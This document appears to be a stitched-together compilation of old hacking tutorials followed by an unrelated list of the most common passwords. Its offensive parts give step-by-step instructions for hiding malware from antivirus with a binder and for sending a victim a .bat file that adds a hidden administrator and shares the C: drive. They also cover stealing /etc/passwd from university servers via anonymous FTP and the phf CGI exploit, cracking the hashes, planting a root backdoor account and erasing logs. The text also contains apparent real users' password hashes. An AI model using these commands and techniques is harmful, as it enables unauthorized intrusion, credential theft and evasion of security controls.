1. Download Software Passport by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here

There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)

2. Once you download the program, install it.
3. Once installed, you open it up and see this:

This is the program. Now that you have it open, you might be confused on what the hell to do, right? Well, this is what you do!

1. Download this pre-made settings. These settings are pre-made by me so you won’t be confused. Everything is working.

DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
http://rapidshare.com/files/8749860/projects.arm.html

DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!
http://rapidshare.com/files/8750048/projects.Stats.html
Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).

Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!

Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.

Now, once its created, they are %100 undetectable. Go to
Code:
virustotal.com
to scan it with every Antivirus, and they wont find ANYTHING!

-Bazicz-

Opening a dos prompt -> Go to start and then execute and write

cmd and press ok

Now insert this command: net

And you will get something like this

NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |

HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |

SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

Ok in this tutorial we well use 3 of the commands listed here

they are: net user , net share and net send

We will select some of those commands and put them on a .bat file.

What is a .bat file?

Bat file is a piece of text that windows will execute as commands.

Open notepad and write there:

dir

pause

And now save this as test.bat and execute it.

———————- Starting ——————-

-:Server:-

The plan here is to share the C: drive and make a new user

with administrators access

Step one -> Open a dos prompt and a notebook

The dos prompt will help you to test if the commands are ok

and the notebook will be used to make the .bat file.

Command n 1-> net user fox /add

What does this do? It makes a new user called fox you can put

any name you want

Command n 2-> net localgroup administrators fox /add

This is the command that make your user go to the administrators

group.

Depending on the windows version the name will be different.

Command n 3->net share system=C:\ /unlimited

This commands share the C: drive with the name of system.

Nice and those are the 3 commands that you will need to put on your

.bat file and send to your friend.

-!extras!-

Command n 4-> net send urip I am ur server

Where it says urip you will insert your ip and when the victim

opens the .bat it will send a message to your computer

and you can check the victim ip.

->To see your ip in the dos prompt put this command: ipconfig

———————–: Client :—————-

Now that your friend opened your .bat file her system have the

C: drive shared and a new administrator user.

First we need to make a session with the remote computer with

the net use command , you will execute these commands from your

dos prompt.

Command n 1 -> net use \\victimip fox

This command will make a session between you and the victim

Of course where it says victimip you will insert the victim ip.

Command n 2-> explorer \\victimip\system

And this will open a explorer windows in the share system wich is

the C: drive with administrators access!

Basically, websites are defaced by exploiting the vulnerabilities in the web server and gaining root shell injecting malicious coded into the target page residing on the server. In this tutorial, I will be explaining how to exploit the known vulnerabilities. I will be explaining some methods of exploiting the most vulnerable Microsoft IIS server.

(more…)

First of all you will need an ftp program such as ws_ftp. I use Voyager FTP
downloadable at http://www.windows95.com it’s real simple and easy to use,
so try it if you haven’t dealt with ftp before. Now once you have the
program find an address like http://www.shiga-pc.ac.jp you can find
addresses like this by going to a search engine such as AltaVista and
running a search for url:ac.jp this tells the search engine to give you
all the academic addresses in Japan ex. ac=academic jp=Japan , you can
try this with any country ex. urlk . But for now let’s just focus on
the Japanese servers. When u have an address (I would recommend making a
list of about 100 and trying them all) go to your ftp program and type in
the address ex. http://www.shiga-pc.ac.jp note..

You will have to log in anonymously. You should then get a list of folders on the remote system
usr, pub,etc, dev, bin. See the etc folder? open it, once opened you should
see some files passwd and group, open or view the file passwd (this is where
the passwords for the system are stored), you should hopefully get something
that looks like this.

root:RqX6dqOZsf4BI:0:1:System PRIVILEGED Account,,,:/:/bin/csh
fieldASSWORD HERE:0:1:Field Service PRIVILEGED Account:/usr/field:/bin/csh
operatorASSWORD HERE:0:28perator PRIVILEGED Account:/opr:/opr/opser
ris:Nologin:11:11:Remote Installation Services Account:/usr/adm/ris:/bin/sh
daemon:*:1:1:Mr Background:/:
sysASSWORD HERE:2:3:Mr Kernel:/usr/sys:
binASSWORD HERE:3:4:Mr Binary:/bin:
uucp:Nologin:4:1:UNIX-to-UNIX Copy:/usr/spool/uucppublic:/usr/lib/uucp/uucico
uucpa:Nologin:4:1:uucp adminstrative account:/usr/lib/uucp:
sso:Nologin:6:7:System Security Officer:/etc/security:
news:Nologin:8:8:USENET News System:/usr/spool/netnews:
sccsASSWORD HERE:9:10:Source Code Control:/:
ingresASSWORD HERE:267:74:ULTRIX/SQL Administrator:/usr/kits/sql:/bin/csh
rlembke:n25SO.YgDxqhs:273:15:Roger Lembke,,,:/usr/email/users/rlembke:/bin/csh
rhuston:ju.FWWOh0cUSM:274:15:Robert Huston,st 304c,386,:/usr/email/users/rhuston:/bin/csh
jgordon:w4735loqb8F5I:275:15:James.”Tiger” Gordon:/usr/email/users/jgordon:/bin/csh
lpeery:YIJkAzKSxkz4M:276:15:Larry Peery:/usr/email/users/lpeery:/bin/csh
nsymes:lSzkVgKhuOWRM:277:15:Nancy Symes:/usr/email/users/nsymes:/bin/csh
llembke:yDAq2xZgzqmms:278:15:Linda Lembke:/usr/email/users/llembke:/bin/csh
grees:eb2pQcYI0Q5UI:279:15:Gary Rees:/usr/email/users/grees:/bin/csh
nreece:NiwrmCHzn5p7A:281:15:Neva Reece:/usr/email/users/nreece:/bin/csh
delliott:8Q1O1LukmfXfA:283:15an Elliott:/usr/email/users/delliott:/bin/csh
erobinet:vGufhYNuhkTZ6:284:15:Eric Robinette:/usr/email/users/erobinet:/bin/csh
mhirsch:0AgYY2.YBLj8Y:285:15:Michael Hirsch:/usr/email/users/mhirsch:/bin/csh
schristi:yckqD6acrG2OM:289:15:Scott Christianson:/usr/email/users/schristi:/bin/csh
pdrummon:39MW8ROgoY.T6:294:15:R.Paul Drummond:/usr/email/users/pdrummon:/bin/csh
dbrown:fmTUonryY2mCE:295:15oris Brown:/usr/email/users/dbrown:/bin/csh
This means you’ve hit the jackpot, in this case you should get a password
cracker download one at (http://www.hackersweb.com go to the hacking toolz
section), I would recommend for the beginning hacker to get a password
cracker such as killer cracker because it’s extremely easy to use. Once you
have downloaded killer cracker you will need a dictionary file
(get one at http://www.hackersweb.com look in the extra toolz section),
dictionary filez are better the bigger they are so I would recommend
getting one at around 10 MB or more. Now the passwords from the passwd
file off the server you are hacking, you will need to save them to a file
and place them in the same directory as Killer Cracker, you will also need
to have your dictionary file in the same directory. Now you are ready to
go, just run killer cracker and tell it the name of the Pwfile=the password
file and the name of the word file=your dictionary file, the valid file will
be the file where the output of the password cracker will be put just give
it a name such as crack.txt. Once the cracker is done cracking the password
files for you goto the valid file and take a look the file should look
something like this root:root:0:1:System PRIVILEGED Account,,,:/:/bin/csh
(remember this is an example). This file says that the username is root
and the password is rootif the file had been like this.
rootumbass:0:1:System PRIVILEGED Account,,,:/:/bin/csh
(remember again just an example) the login or username would be root and
the password would be dumbass, well that’s it just ftp to the site using
the login and password. Note if you get root type in the following once
you have logged in:- echo “myserver::0:0:Test User:/:/bin/csh”>>etc\passwd
this will allow you to login to the server with 1:myserver so you
get the admin suspicious when they see people login as root. Hide yourself
as much as possible, if you already have a shell then go through that first
when loggin on, or telnet to the hacked site shell and then re-telnet to the
hacked shell using the hacked shell, if you see what I mean, so your who
appears as local host. Also get some c scripts which delete your presence,
erases you off logs etc…
Now if you were not as lucky to get exactly the same password file as shown
in the example above then maybe you got something like this.
root:*:0:1perator:/:
ftp:*:53:53:anonymous ftp:/pub:
t2:*:201:201:Takaoka Tadashi:/pub:
This means that the passwd file is shadowed, if this is the case then
welcome to the administrators world of trying to stop hackers, this is
where you cant really do anything. However there is one thing to do
sometimes in very rare cases there may be a folder on the remote system
that can be accessed by an anonymous login called shadowed, shadow, or
secret if this is the case the password files should be in there,
congratulations. If there isn’t a folder like this, and the passwd file
is shadowed then bad luck, go to the next address on your list.
Now that you have tried the first thing as shown above there are a couple
of other methods you may also want to try one is FTP hacking shown below…
Go to a dos prompt after you are connected to the internet .
Type.
ftp http://www.victim=the site address
server will ask for a username press enter
server will ask for a password press enter
at the prompt type quote user ftp
then type
quote cwd ~root
then type
quote pass ftp
If you get in make sure you delete the log file they might look at it and
see that you were on. Once you get on the passwd file is in etc/passwd so
type cd etc then type get passwd. If you have done the above right and the
server is old you will have root access. By the way root is the highest
security status you can have.

Another good way of getting root or a shell at least is through browser
hacking. Again well use Japanese educational servers as our target. To do
this you will need a browser such as Netscape or Internet Explorer, you
will also need a telnet program, you can either download a telnet program
at http://www.windows95.com or use the one that already comes with dos.
To access the telnet program that comes with dos go to your dos windows and
type in telnet http://www.site.com the site.com stand for the site you want to
telnet to, it could be anything like http://www.geidai.ac.jp or
http://www.tulips.tsukuba.ac.jp . You will also need a cracker program I would
recommend using Killer Cracker and applying as above.
Next thing you do is open your browser and run a search for url:ac.jp ,
like explained above. Again I would recommend making a big list of your
targets. Now when you have your targets we address type it in your browser
and add this to it…
http://www.tagetgoeshere.com/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
or
http://www.tagetgoeshere.com/cgi/phf?Qalias=x/bin/cat%20/etc/passwd
To all you out there who are slightly advanced, I know this is the phf
technique and it is virtually dead, but you’ll be surprised where you can
use this.
This technique of finding the password file was first used in November 1996
on the fbi.gov webpage by a few hackers. It has been patched up by a lot of
servers, so this won’t work on something like http://www.nasa.gov or most of the
www.*.com sites. But still works on many university servers outside Europe
and the U.S.
O.K. Once the url is entered you will see a number of things:-
Error 404
Cgi-bin/phf is not found on this server (the most common one)
Or
Warning
You do not have permission to view cgi-bin/phf?/ on this server
There are a number of other things the server might say, but the thing you
want it to say is this:-
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
root:2hjh34b4hj:0:1:0000-Admin(0000):/:/bin/sh
daemon:fghfhijyjk:1:1:0000-Admin(0000):/:
bin:fghfed7tfndgh:2:2:0000-Admin(0000):/usr/bin:/bin/csh
sys:fdn7:3:3:0000-Admin(0000):/:
admehf6:4:4:0000-Admin(0000):/var/adm:
wnnfhfnv:5:5:0000-Admin(0000):/var/adm:
newsetdc:6:6:0000-Admin(0000):/usr/lib/news:
lp:qwwos:71:8:0000-lp(0000):/usr/spool/lp:
smtp:cmvof:0:0:mail daemon user:/:
uucp:lcocbe:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucpelebd:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:eoend:37:4:Network Admin:/usr/net/nls:
nobody:ccvjcvj:60001:60001:uid no b
etc…
This means you have hit the jackpot!!!
If you get something similar to this but all lines have something in common
like the following:-
Query Results
/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd
root:x:0:1:0000-Admin(0000):/:/bin/sh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:/bin/csh
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm:
wnn:x:5:5:0000-Admin(0000):/var/adm:
news:x:6:6:0000-Admin(0000):/usr/lib/news:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid no b
(notice the c) if you don’t know what this means it means the password
file is shadowed and you cannot work out ht epasswords for a shadowed
password file then you’re in bad luck, I would recommend trying the ftp
hack prior to this for the best results.
If some but not all logins have a * in them then it’s ok, it’s worth while
getting the ones which aren’t shadowed, hey a shell is a shell!!!
If you want to use your newly acquired shells then telnet to the site and
put in the login and the password (remember you have to crack the password
file first explained at the top).

Here are listed the most commonly occuring from the sample.

10. ‘thomas’ (0.99‰)

First off, at number 10, is the most common format of passwords – the name. Thomas is a perennially popular name in the UK (2nd most popular in 2000), so it is perhaps no surprise that it makes the top 10, with nearly 1 in 1,000 people opting for this ubiquitous forename as their password.

We can only guess that there are a lot of fans of Thomas Jefferson or Thomas Edison out there! The high prevalence of Christian names only further reinforces the fact that loved ones are a common choice when it comes to passwords.

9. ‘arsenal’ (1.11‰)

Football teams tend to be another popular choice, and the gunners fall in 9th place. This may or may not be reflective of the fact that the word ‘arsenal’ starts with a 4-letter swear word – another popular choice when it comes to passwords.

Arsenal are ranked 6th overall in average attendance rankings, and are the 2nd most popular football-related password.

8. ‘monkey’ (1.33‰)

Quite why the monkey makes it into 8th place is beyond me, but the fact that it’s a 6-letter word (6 letters is a typical minimum length for passwords), is easily typed and is memorable probably helps cement its position as ideal password material.

Still, it’s quite worrying that there’s such a trend – perhaps the internet and monkeys are inextricably linked?

7. ‘charlie’ (1.39‰)

Another name – nowhere near as common a name as No. 10, Thomas, but it’s our most popular name-based password overall.

Could of course, be a homage to a number of famous Charlies – Chaplin, Sheen, or those of a Chocolate Factory persuasion. Or, of course, it could just be the case that they’re referring to it’s slang usage.

6. ‘qwerty’ (1.41‰)

I wonder where the inspiration for this one came from? Perhaps when faced with a blinking cursor and an instruction to choose a password people will tend to look to the things closest to them – which would explain why 1 in 700 people choose ‘qwerty’ as their password.

5. ‘123456′ (1.63‰)

Can you count to 6? It’s the most common minimum required length of password – and the 5th most common password.

4. ‘letmein’ (1.76‰)

A modern-day version of ‘open sesame’ – and 1 person in 560 will type ‘letmein’ as their password. Quite why is beyond me.

I could be mistaken, but I have a hunch that ‘letmein’ has been featured in a movie or TV series – Fox Mulder’s password from the X Files – ‘trustno1′ – also ranked quite highly.

3. ‘liverpool’ (1.82‰)

The most popular football team by some margin, Liverpool was the third most popular password overall. Does this mean that 1 in 550 people is such a devout Liverpool fan that they would be willing to entrust private data to the team they love?

Liverpool ranked 3rd in the average attendance ratings – leaving the 2 most popular teams, Manchester United and Newcastle United, out of the top 10 list – perhaps because they’re too long and difficult to type.

2. ‘password’ (3.780‰)

Akin to pressing the ‘any’ key, when told to enter a ‘password’, it would seem that users aren’t the sharpest tool in the box – with almost 1 in 250 people choosing the word ‘password’.

1. ‘123′ (3.784‰)

With nearly 4 people in 1,000 opting for a simple numerical sequence as their password (it should be noted that there was no lower length limit specified), ‘123′ must be the first thing a lot of people think of when asked to specify a password. One dreads to think what their PIN number might be!